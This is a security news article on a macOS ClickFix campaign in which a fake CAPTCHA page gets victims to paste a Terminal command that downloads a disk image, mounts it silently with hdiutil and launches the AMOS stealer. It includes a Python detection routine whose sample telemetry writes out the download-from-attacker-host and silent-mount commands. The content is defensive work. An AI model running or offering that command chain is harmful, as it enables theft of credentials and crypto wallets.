Researchers at Palo Alto Networks Unit 42 have documented a macOS-specific evolution of the ClickFix social engineering campaign that eliminates a key user interaction step, allowing the Atomic macOS Stealer infostealer to launch automatically after a single Terminal command — without requiring the victim to open a disk image manually.
The New Technique: Silent DMG Mounting via hdiutil
Previous macOS ClickFix variants ran into a practical obstacle: after tricking a user into executing a Terminal command, the attack chain still required the victim to locate and manually open a downloaded DMG file before the payload could run.
hdiutil attach -nobrowse: Eliminating the Last Manual Step in macOS ClickFix
The newly documented variant removes that step by incorporating the native macOS utility hdiutil with the attach -nobrowse flag. This command mounts a disk image in the background without surfacing it in the Finder window, meaning the file becomes accessible on the filesystem — and its contents auto-execute — without any visible indication to the user that a disk image was mounted at all.
Attack Chain: Fake CAPTCHA to Stealer Launch
The infection sequence begins with a fraudulent CAPTCHA verification page. The page instructs the visitor that completing verification requires opening Terminal and pasting a command, framed as a standard identity check. The command downloads a DMG file from attacker-controlled infrastructure and immediately mounts it using hdiutil attach -nobrowse. Because the disk image is never surfaced in Finder, the victim has no visual prompt to accept or decline. The mounted image contains a self-signed application bundle — the observed sample was labeled NNApp.app within a file named s.01M0td.dmg — and that application launches automatically, initiating the AMOS infostealer payload.
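The chain described above leaves a distinctive trace in process-execution telemetry, which is where a defender can catch it even though no vulnerability is exploited. The following detection logic is an added example, not code from the Unit 42 report; the event schema, the sample records, the placeholder domain and the `open /Volumes/...` launch stage are assumptions made for the example.

```python
"""Flag a .dmg download followed by `hdiutil attach -nobrowse` (and optionally
an app launch from /Volumes) when all three are children of the same
interactive shell, which is what a pasted Terminal one-liner produces.
Event schema and sample records are constructed for this example."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    ts: float     # seconds since epoch
    ppid: int     # parent pid; for ClickFix this is the victim's Terminal shell
    parent: str   # parent executable name
    cmd: str      # command line as executed

SHELLS = {"zsh", "bash", "sh"}
DMG_DOWNLOAD = re.compile(r"\b(curl|wget)\b.*\.dmg\b")
SILENT_MOUNT = re.compile(r"\bhdiutil\s+attach\b.*\s-nobrowse\b")
VOLUME_LAUNCH = re.compile(r"\bopen\b.*\s/Volumes/\S+\.app\b")  # assumed stage

def find_clickfix_chains(events, window=120.0):
    """Return one (shell ppid, stages) tuple per shell session in which a .dmg
    download is followed within `window` seconds by a silent mount; a launch
    from /Volumes in the same window is appended as a third stage."""
    by_shell = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.parent in SHELLS:
            by_shell.setdefault(ev.ppid, []).append(ev)
    hits = []
    for ppid, evs in by_shell.items():
        for i, ev in enumerate(evs):
            if not DMG_DOWNLOAD.search(ev.cmd):
                continue
            later = [e for e in evs[i + 1:] if e.ts - ev.ts <= window]
            if not any(SILENT_MOUNT.search(e.cmd) for e in later):
                continue
            stages = ["dmg_download", "silent_mount"]
            if any(VOLUME_LAUNCH.search(e.cmd) for e in later):
                stages.append("volume_app_launch")
            hits.append((ppid, stages))
            break  # one alert per shell session is enough
    return hits

# Constructed telemetry: shell 501 follows the ClickFix pattern; shell 777 is an
# admin mounting a vendor DMG normally (no -nobrowse) and must not alert.
SAMPLE_EVENTS = [
    ProcEvent(1000.0, 501, "zsh", "curl -sL -o /tmp/s.01M0td.dmg https://attacker.invalid/s.01M0td.dmg"),
    ProcEvent(1001.5, 501, "zsh", "hdiutil attach -nobrowse /tmp/s.01M0td.dmg"),
    ProcEvent(1003.0, 501, "zsh", "open /Volumes/NNApp/NNApp.app"),
    ProcEvent(2000.0, 777, "bash", "curl -O https://vendor.example/tool.dmg"),
    ProcEvent(2005.0, 777, "bash", "hdiutil attach tool.dmg"),
]
```

Feeding real EDR process events into `find_clickfix_chains` only requires mapping them onto `ProcEvent`; the shell-parent constraint keeps ordinary GUI-driven DMG mounts out of the alert stream.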
AMOS: What the Stealer Targets
The Atomic macOS Stealer is an infostealer with a specific focus on high-value credential and financial targets. Its collection capabilities span multiple cryptocurrency wallet applications, including Exodus, Electrum, Atomic Wallet, Wasabi, and Bitcoin Core.
AMOS Targets: Crypto Wallets, Browser Credentials, and iCloud Keychain Data
Beyond cryptocurrency, AMOS harvests saved credentials from major web browsers, data stored in iCloud Keychain, and documents accessible in the user’s standard directories. The combination of wallet software targeting and Keychain access makes AMOS particularly effective against users who manage digital assets on their primary work or personal machines.
What Changed From Prior macOS ClickFix Variants
Unit 42’s analysis specifically highlights the hdiutil technique as a meaningful advancement in the campaign’s operational effectiveness. Earlier macOS ClickFix attempts depended on the victim completing a manual step after the Terminal command ran — a point at which a cautious user might pause, investigate the downloaded file, or simply not know how to proceed. The silent mount approach collapses that window. From the moment the Terminal command executes successfully, no further user decision is required to reach code execution. The user interaction the attack depends on is effectively reduced to a single social engineering moment: convincing the user to paste the initial command.
Researcher Attribution and Sample Details
Unit 42 identified the campaign during threat intelligence monitoring and published findings on the technique. The observed sample — s.01M0td.dmg — contained the NNApp.app bundle signed with a self-signed certificate. Self-signing is consistent with malware distribution patterns that seek to avoid detection by Apple’s notarization process, which would flag the application for additional scrutiny before execution. The use of a nondescript application name and DMG filename reflects deliberate obfuscation to avoid drawing attention during the brief window between download and auto-launch.
Impact and Takeaway
The shift to silent DMG mounting represents a measurable reduction in the friction that previously constrained ClickFix’s effectiveness on macOS. For organizations and individuals managing cryptocurrency holdings, the combination of AMOS’s wallet-targeting scope and a delivery mechanism that requires only one user action creates a materially elevated threat. The fact that the attack uses a legitimate, built-in macOS system utility — hdiutil — rather than exploiting a software vulnerability means traditional patch-based defenses offer no direct mitigation. The incident also signals that ClickFix operators are actively iterating their macOS-specific tradecraft rather than treating the platform as a secondary target.
